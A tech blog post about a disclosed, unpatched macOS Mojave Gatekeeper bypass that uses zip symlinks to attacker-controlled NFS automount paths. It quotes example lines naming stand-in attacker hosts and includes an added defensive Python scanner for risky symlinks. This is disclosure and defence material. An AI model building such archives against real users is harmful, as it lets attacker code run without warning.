Unpatched macOS Mojave Vulnerability Exposed…. And Apple Hasn’t Fixed It…WTF?

A new macOS Mojave vulnerability has been disclosed: a way to bypass the Gatekeeper security functionality of macOS. Filippo Cavallarin publicized the vulnerability today, after the 90-day window that Apple had to fix it expired. Here are the details:

The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a “special” path, in this case, any path beginning with “/net/”.

For example ‘ls /net/evil-attacker.com/sharedfolder/’ will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.

The second legit feature is that zip archives can contain symbolic links pointing to an arbitrary location (including automount endpoints) and that the software on MacOS that is responsible to decompress zip files does not perform any check on the symlinks before creating them.

Here’s an example of how this would work:

To better understand how this exploit works, let’s consider the following scenario: An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim.

The victim downloads the malicious archive, extracts it and follows the symlink.

Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot.

And there’s a video showing the exploit in action:

At this point the vulnerability is unpatched in macOS Mojave 10.14.5. What’s worse, Cavallarin says Apple has stopped responding to his emails, which is shameful on Apple’s part. For a company that claims to want to protect its users, you would expect better.
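Until a fix ships, one defensive check is to inspect a zip archive for symlink entries before extracting it. The following is an added example, not code from the original post or from Cavallarin's disclosure; it flags symlinks that point at the `/net/` automount path described above, at any other absolute path, or outside the archive. The function names, reason labels and sample archive are constructed for illustration.

```python
import io
import posixpath
import stat
import zipfile

AUTOMOUNT_PREFIX = "/net/"  # autofs path named in the disclosure

def classify_target(entry_name, target):
    """Return why a symlink target is risky, or None if it stays inside the archive."""
    norm = posixpath.normpath(target)
    if posixpath.isabs(norm):
        norm = "/" + norm.lstrip("/")  # collapse '//net/...' to '/net/...'
        if (norm + "/").startswith(AUTOMOUNT_PREFIX):
            return "automount"
        return "absolute"
    resolved = posixpath.normpath(posixpath.join(posixpath.dirname(entry_name), norm))
    if resolved == ".." or resolved.startswith("../"):
        return "escapes-archive"
    return None

def find_risky_symlinks(zip_bytes):
    """List (entry, target, reason) for symlink entries pointing outside the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Unix mode is stored in the high 16 bits of external_attr.
            if not stat.S_ISLNK(info.external_attr >> 16):
                continue
            # A symlink entry's data is the link target path.
            target = zf.read(info).decode("utf-8", "replace")
            reason = classify_target(info.filename, target)
            if reason:
                findings.append((info.filename, target, reason))
    return findings

def build_sample_zip():
    """Constructed sample: one regular file and three symlink entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "hello")
        for name, target in [("Documents", "/net/evil.com/Documents"),
                             ("docs/current", "v1"),
                             ("docs/up", "../../etc")]:
            link = zipfile.ZipInfo(name)
            link.create_system = 3  # Unix, so external_attr holds a mode
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, target)
    return buf.getvalue()

if __name__ == "__main__":
    for finding in find_risky_symlinks(build_sample_zip()):
        print(finding)
```

A relative link that stays inside the archive (`docs/current -> v1` in the sample) is not reported; only the automount and escaping links are.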


3 Responses to “Unpatched macOS Mojave Vulnerability Exposed…. And Apple Hasn’t Fixed It…WTF?”

  1. […] off the heels of this vulnerability that Apple hasn’t seen fit to fix comes another one that I would rate as dangerous and is […]

  2. Shapla.co.kr

    Unpatched macOS Mojave Vulnerability Exposed…. And Apple Hasn’t Fixed It…WTF? | The IT Nerd

  3. […] might recall that I told you about a macOS Mojave vulnerability in which there is a way to bypass the Gatekeeper security functionality of macOS. And what’s […]
